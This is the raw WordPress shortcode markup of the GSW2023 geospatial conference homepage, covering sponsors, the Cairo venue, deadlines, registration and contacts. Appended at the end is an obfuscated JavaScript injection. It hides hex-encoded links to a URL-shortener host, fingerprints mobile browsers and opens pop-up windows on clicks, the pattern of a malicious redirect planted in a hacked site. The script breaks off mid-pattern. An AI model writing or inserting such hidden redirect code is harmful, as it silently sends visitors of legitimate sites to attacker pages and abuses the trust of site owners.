src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n[vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"]\r\n<h3>[vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner]</h3>\r\n<h3>[vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 